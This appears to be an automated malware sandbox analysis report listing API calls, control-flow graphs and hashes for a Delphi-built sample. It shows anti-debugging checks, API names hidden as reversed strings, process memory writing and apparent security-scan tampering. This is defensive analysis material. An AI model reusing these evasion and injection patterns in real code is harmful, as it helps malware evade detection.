                                                                                                                                control_flow_graph 10945 2a05acc-2a05b0d GetModuleFileNameA RegOpenKeyExA 10946 2a05b4f-2a05b92 call 2a05908 RegQueryValueExA 10945->10946 10947 2a05b0f-2a05b2b RegOpenKeyExA 10945->10947 10952 2a05b94-2a05bb0 RegQueryValueExA 10946->10952 10953 2a05bb6-2a05bd0 RegCloseKey 10946->10953 10947->10946 10948 2a05b2d-2a05b49 RegOpenKeyExA 10947->10948 10948->10946 10950 2a05bd8-2a05c09 lstrcpynA GetThreadLocale GetLocaleInfoA 10948->10950 10954 2a05cf2-2a05cf9 10950->10954 10955 2a05c0f-2a05c13 10950->10955 10952->10953 10958 2a05bb2 10952->10958 10956 2a05c15-2a05c19 10955->10956 10957 2a05c1f-2a05c35 lstrlenA 10955->10957 10956->10954 10956->10957 10960 2a05c38-2a05c3b 10957->10960 10958->10953 10961 2a05c47-2a05c4f 10960->10961 10962 2a05c3d-2a05c45 10960->10962 10961->10954 10964 2a05c55-2a05c5a 10961->10964 10962->10961 10963 2a05c37 10962->10963 10963->10960 10965 2a05c84-2a05c86 10964->10965 10966 2a05c5c-2a05c82 lstrcpynA LoadLibraryExA 10964->10966 10965->10954 10967 2a05c88-2a05c8c 10965->10967 10966->10965 10967->10954 10968 2a05c8e-2a05cbe lstrcpynA LoadLibraryExA 10967->10968 10968->10954 10969 2a05cc0-2a05cf0 lstrcpynA LoadLibraryExA 10968->10969 10969->10954
                                                                                                                                APIs
                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000105,02A00000,02A2E790), ref: 02A05AE8
                                                                                                                                • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02A00000,02A2E790), ref: 02A05B06
                                                                                                                                • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02A00000,02A2E790), ref: 02A05B24
                                                                                                                                • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02A05B42
                                                                                                                                • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02A05BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02A05B8B
                                                                                                                                • RegQueryValueExA.ADVAPI32(?,02A05D38,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02A05BD1,?,80000001), ref: 02A05BA9
                                                                                                                                • RegCloseKey.ADVAPI32(?,02A05BD8,00000000,?,?,00000000,02A05BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02A05BCB
                                                                                                                                • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02A05BE8
                                                                                                                                • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02A05BF5
                                                                                                                                • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02A05BFB
                                                                                                                                • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02A05C26
                                                                                                                                • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02A05C6D
                                                                                                                                • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02A05C7D
                                                                                                                                • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02A05CA5
                                                                                                                                • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02A05CB5
                                                                                                                                • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02A05CDB
                                                                                                                                • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02A05CEB
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2a00000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                                                                                • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                                                • API String ID: 1759228003-2375825460
                                                                                                                                • Opcode ID: 70dd7cffabf37d7b7a0cfa52373ee44142389c3e4b59fb9e7b22d924cf48ca1d
                                                                                                                                • Instruction ID: 31087d50015505282b23d42fd9d247394aad6ed61d5a48efe59d5eb85c069f6d
                                                                                                                                • Opcode Fuzzy Hash: 70dd7cffabf37d7b7a0cfa52373ee44142389c3e4b59fb9e7b22d924cf48ca1d
                                                                                                                                • Instruction Fuzzy Hash: E9515471E4025C7AFB25D6A4ADC6FEFB7ADAB08744F4001A5BA04E61C1EE749A448F60

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 13205 2a1894c-2a18971 LoadLibraryW 13206 2a18973-2a1898b GetProcAddress 13205->13206 13207 2a189bb-2a189c1 13205->13207 13208 2a189b0-2a189b6 FreeLibrary 13206->13208 13209 2a1898d-2a189ac call 2a17d78 13206->13209 13208->13207 13209->13208 13212 2a189ae 13209->13212 13212->13208
                                                                                                                                APIs
                                                                                                                                • LoadLibraryW.KERNEL32(bcrypt,?,000008A8,00000000,02A873A8,02A1A587,ScanString,02A873A8,02A1A93C,ScanBuffer,02A873A8,02A1A93C,Initialize,02A873A8,02A1A93C,UacScan), ref: 02A18960
                                                                                                                                • GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02A1897A
                                                                                                                                • FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,000008A8,00000000,02A873A8,02A1A587,ScanString,02A873A8,02A1A93C,ScanBuffer,02A873A8,02A1A93C,Initialize), ref: 02A189B6
                                                                                                                                  • Part of subcall function 02A17D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02A17DEC
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2a00000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
                                                                                                                                • String ID: BCryptVerifySignature$bcrypt
                                                                                                                                • API String ID: 1002360270-4067648912
                                                                                                                                • Opcode ID: 9fbf6d6b0c088b76ddf7ef2caaf20980fd327b49d3c3ff7a169480d4ff0f87a2
                                                                                                                                • Instruction ID: 4a9f1a5aa76207f5a1a2da7ddef180564ea80050feb6e9b3ed19003cd81b986b
                                                                                                                                • Opcode Fuzzy Hash: 9fbf6d6b0c088b76ddf7ef2caaf20980fd327b49d3c3ff7a169480d4ff0f87a2
                                                                                                                                • Instruction Fuzzy Hash: E2F04475EC13146EE310A769ADC9F57F79CD746724F2009A9F90887180CF7594528B52

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 13222 2a1f744-2a1f75e GetModuleHandleW 13223 2a1f760-2a1f772 GetProcAddress 13222->13223 13224 2a1f78a-2a1f792 13222->13224 13223->13224 13225 2a1f774-2a1f784 CheckRemoteDebuggerPresent 13223->13225 13225->13224 13226 2a1f786 13225->13226 13226->13224
                                                                                                                                APIs
                                                                                                                                • GetModuleHandleW.KERNEL32(KernelBase), ref: 02A1F754
                                                                                                                                • GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02A1F766
                                                                                                                                • CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02A1F77D
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2a00000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AddressCheckDebuggerHandleModulePresentProcRemote
                                                                                                                                • String ID: CheckRemoteDebuggerPresent$KernelBase
                                                                                                                                • API String ID: 35162468-539270669
                                                                                                                                • Opcode ID: 96b1857a67b78fc11c40eed569c9799a18be4ea38e8629397733ae2c5610d2cd
                                                                                                                                • Instruction ID: db11b277eded32e5f96d8578597e14d45bc208a4435b920247aaa527b7479d15
                                                                                                                                • Opcode Fuzzy Hash: 96b1857a67b78fc11c40eed569c9799a18be4ea38e8629397733ae2c5610d2cd
                                                                                                                                • Instruction Fuzzy Hash: CDF08270904398FEEB10A7F888C879CBBA96F05338F2843909425A25C1EB7506508A61

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 02A04F20: SysAllocStringLen.OLEAUT32(?,?), ref: 02A04F2E
                                                                                                                                • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02A1DE40), ref: 02A1DDAB
                                                                                                                                • NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02A1DE40), ref: 02A1DDDB
                                                                                                                                • NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02A1DDF0
                                                                                                                                • NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02A1DE1C
                                                                                                                                • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02A1DE25
                                                                                                                                  • Part of subcall function 02A04C60: SysFreeString.OLEAUT32(02A1F4A4), ref: 02A04C6E
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2a00000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: File$PathString$AllocCloseFreeInformationNameName_OpenQueryRead
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1897104825-0
                                                                                                                                • Opcode ID: 6e64eb300950c3605369f0ac1359e570b5e03ab73c87f12e1a7c9eed780335bf
                                                                                                                                • Instruction ID: ac4253cb68560ba402937f11b29e996222775635e26ed23163d42f6be302322f
                                                                                                                                • Opcode Fuzzy Hash: 6e64eb300950c3605369f0ac1359e570b5e03ab73c87f12e1a7c9eed780335bf
                                                                                                                                • Instruction Fuzzy Hash: E621C071A84708BEEB51EA94DD92FDE77ADAB48B10F500461B701E71C0DE74AA048B54

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02A1E5F6
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2a00000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CheckConnectionInternet
                                                                                                                                • String ID: Initialize$OpenSession$ScanBuffer
                                                                                                                                • API String ID: 3847983778-3852638603
                                                                                                                                • Opcode ID: b07f510d9d1693f50a84cc4b7c8f9d009adbf8c87c2e54f56a048a8e4f79d2b7
                                                                                                                                • Instruction ID: 581bf39ed1325a890fc1ab9d26c6b05b2d9334b9eb63b128e4f06df69ed6b901
                                                                                                                                • Opcode Fuzzy Hash: b07f510d9d1693f50a84cc4b7c8f9d009adbf8c87c2e54f56a048a8e4f79d2b7
                                                                                                                                • Instruction Fuzzy Hash: 8C413235F80248ABEB01EBA4EA81ADEB3FAFF8C710F504435E551A7284DE34AD118F55
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 02A04F20: SysAllocStringLen.OLEAUT32(?,?), ref: 02A04F2E
                                                                                                                                • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02A1DD5E), ref: 02A1DCCB
                                                                                                                                • NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02A1DD05
                                                                                                                                • NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02A1DD32
                                                                                                                                • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02A1DD3B
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2a00000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: FilePath$AllocCloseCreateNameName_StringWrite
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3764614163-0
                                                                                                                                • Opcode ID: 20f73391d007380f1fc97f202dff4b57329fcf6eaa15573e8e4458e5284a3bfb
                                                                                                                                • Instruction ID: eea640ababc58e5cf176a1f286ef711e85d4b2741d282ddd483df8766d5e1dbf
                                                                                                                                • Opcode Fuzzy Hash: 20f73391d007380f1fc97f202dff4b57329fcf6eaa15573e8e4458e5284a3bfb
                                                                                                                                • Instruction Fuzzy Hash: 8A21BE71A85608BEEB10EA94DD82FDEB7BDEB08B10F514461B701F71C0DBB46A048B64
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 02A181CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02A1823C,?,?,00000000,?,02A17A7E,ntdll,00000000,00000000,02A17AC3,?,?,00000000), ref: 02A1820A
                                                                                                                                  • Part of subcall function 02A181CC: GetModuleHandleA.KERNELBASE(?), ref: 02A1821E
                                                                                                                                  • Part of subcall function 02A18274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02A182FC,?,?,00000000,00000000,?,02A18215,00000000,KernelBASE,00000000,00000000,02A1823C), ref: 02A182C1
                                                                                                                                  • Part of subcall function 02A18274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02A182C7
                                                                                                                                  • Part of subcall function 02A18274: GetProcAddress.KERNEL32(?,?), ref: 02A182D9
                                                                                                                                • CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02A18814
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2a00000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: HandleModule$AddressProc$CreateProcessUser
                                                                                                                                • String ID: CreateProcessAsUserW$Kernel32
                                                                                                                                • API String ID: 3130163322-2353454454
                                                                                                                                • Opcode ID: 58a5d7cc95085ddcaa7f76deb69eefd591b9be24e765101b1b0e6dff2aa4d21e
                                                                                                                                • Instruction ID: 32b5337494794b78b24c6b8fc990ee88bb8a88b5bca0884be00253e1ed4afdaa
                                                                                                                                • Opcode Fuzzy Hash: 58a5d7cc95085ddcaa7f76deb69eefd591b9be24e765101b1b0e6dff2aa4d21e
                                                                                                                                • Instruction Fuzzy Hash: 8F1193B6680248BFEB41EEA8DD81F9A77EDFB4C750F514460FA08D7640CA34ED118B65
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 02A181CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02A1823C,?,?,00000000,?,02A17A7E,ntdll,00000000,00000000,02A17AC3,?,?,00000000), ref: 02A1820A
                                                                                                                                  • Part of subcall function 02A181CC: GetModuleHandleA.KERNELBASE(?), ref: 02A1821E
                                                                                                                                  • Part of subcall function 02A18274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02A182FC,?,?,00000000,00000000,?,02A18215,00000000,KernelBASE,00000000,00000000,02A1823C), ref: 02A182C1
                                                                                                                                  • Part of subcall function 02A18274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02A182C7
                                                                                                                                  • Part of subcall function 02A18274: GetProcAddress.KERNEL32(?,?), ref: 02A182D9
                                                                                                                                • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02A17A9F
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2a00000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: HandleModule$AddressProc$AllocateMemoryVirtual
                                                                                                                                • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                                                                                • API String ID: 4072585319-445027087
                                                                                                                                • Opcode ID: c2ff9359afeb26a13a4c93b097485cedf34ba97ba55d3f6ef267dc644531ba94
                                                                                                                                • Instruction ID: 6526e29b4dba3332fda7f9ff9550f2b78343ea12e747bf95771cda267df008ec
                                                                                                                                • Opcode Fuzzy Hash: c2ff9359afeb26a13a4c93b097485cedf34ba97ba55d3f6ef267dc644531ba94
                                                                                                                                • Instruction Fuzzy Hash: A1110C75680208BFEB04EFA4ED91E9EB7ADFB4C710F504460B900D7680DE34AA108B65
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 02A181CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02A1823C,?,?,00000000,?,02A17A7E,ntdll,00000000,00000000,02A17AC3,?,?,00000000), ref: 02A1820A
                                                                                                                                  • Part of subcall function 02A181CC: GetModuleHandleA.KERNELBASE(?), ref: 02A1821E
                                                                                                                                  • Part of subcall function 02A18274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02A182FC,?,?,00000000,00000000,?,02A18215,00000000,KernelBASE,00000000,00000000,02A1823C), ref: 02A182C1
                                                                                                                                  • Part of subcall function 02A18274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02A182C7
                                                                                                                                  • Part of subcall function 02A18274: GetProcAddress.KERNEL32(?,?), ref: 02A182D9
                                                                                                                                • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02A17A9F
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2a00000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: HandleModule$AddressProc$AllocateMemoryVirtual
                                                                                                                                • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                                                                                • API String ID: 4072585319-445027087
                                                                                                                                • Opcode ID: 71333b5f99d3bb0192bfd41fe4cf87894a6dd5906ad803cc3b2db4d13fe421ff
                                                                                                                                • Instruction ID: d5e15bb46eadd7af22c8f8216261f4a6f23b758ec8d1e6fc48b29ed251e41fb1
                                                                                                                                • Opcode Fuzzy Hash: 71333b5f99d3bb0192bfd41fe4cf87894a6dd5906ad803cc3b2db4d13fe421ff
                                                                                                                                • Instruction Fuzzy Hash: D1111B79680208BFEB04EFA4ED91E9EB7ADFB4C710F5044A0F900D7680DE34AA108B65
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 02A181CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02A1823C,?,?,00000000,?,02A17A7E,ntdll,00000000,00000000,02A17AC3,?,?,00000000), ref: 02A1820A
                                                                                                                                  • Part of subcall function 02A181CC: GetModuleHandleA.KERNELBASE(?), ref: 02A1821E
                                                                                                                                  • Part of subcall function 02A18274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02A182FC,?,?,00000000,00000000,?,02A18215,00000000,KernelBASE,00000000,00000000,02A1823C), ref: 02A182C1
                                                                                                                                  • Part of subcall function 02A18274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02A182C7
                                                                                                                                  • Part of subcall function 02A18274: GetProcAddress.KERNEL32(?,?), ref: 02A182D9
                                                                                                                                • NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02A18471
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2a00000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: HandleModule$AddressProc$MemoryReadVirtual
                                                                                                                                • String ID: ntdll$yromeMlautriVdaeRtN
                                                                                                                                • API String ID: 2521977463-737317276
                                                                                                                                • Opcode ID: 6a3c5ac770331138a4806ebaf3541195fcc6e1ba349afe6eadd4c687034e519a
                                                                                                                                • Instruction ID: dcad0fab2f5f4b4f1de01ef80bd68c114973c2177a847b3e536e60d5b525ac09
                                                                                                                                • Opcode Fuzzy Hash: 6a3c5ac770331138a4806ebaf3541195fcc6e1ba349afe6eadd4c687034e519a
                                                                                                                                • Instruction Fuzzy Hash: 6C01ED79680208BFEB44EFA4ED82E5EB7AEFB4D710F514460F904D7640DE34AD118B65
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 02A181CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02A1823C,?,?,00000000,?,02A17A7E,ntdll,00000000,00000000,02A17AC3,?,?,00000000), ref: 02A1820A
                                                                                                                                  • Part of subcall function 02A181CC: GetModuleHandleA.KERNELBASE(?), ref: 02A1821E
                                                                                                                                  • Part of subcall function 02A18274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02A182FC,?,?,00000000,00000000,?,02A18215,00000000,KernelBASE,00000000,00000000,02A1823C), ref: 02A182C1
                                                                                                                                  • Part of subcall function 02A18274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02A182C7
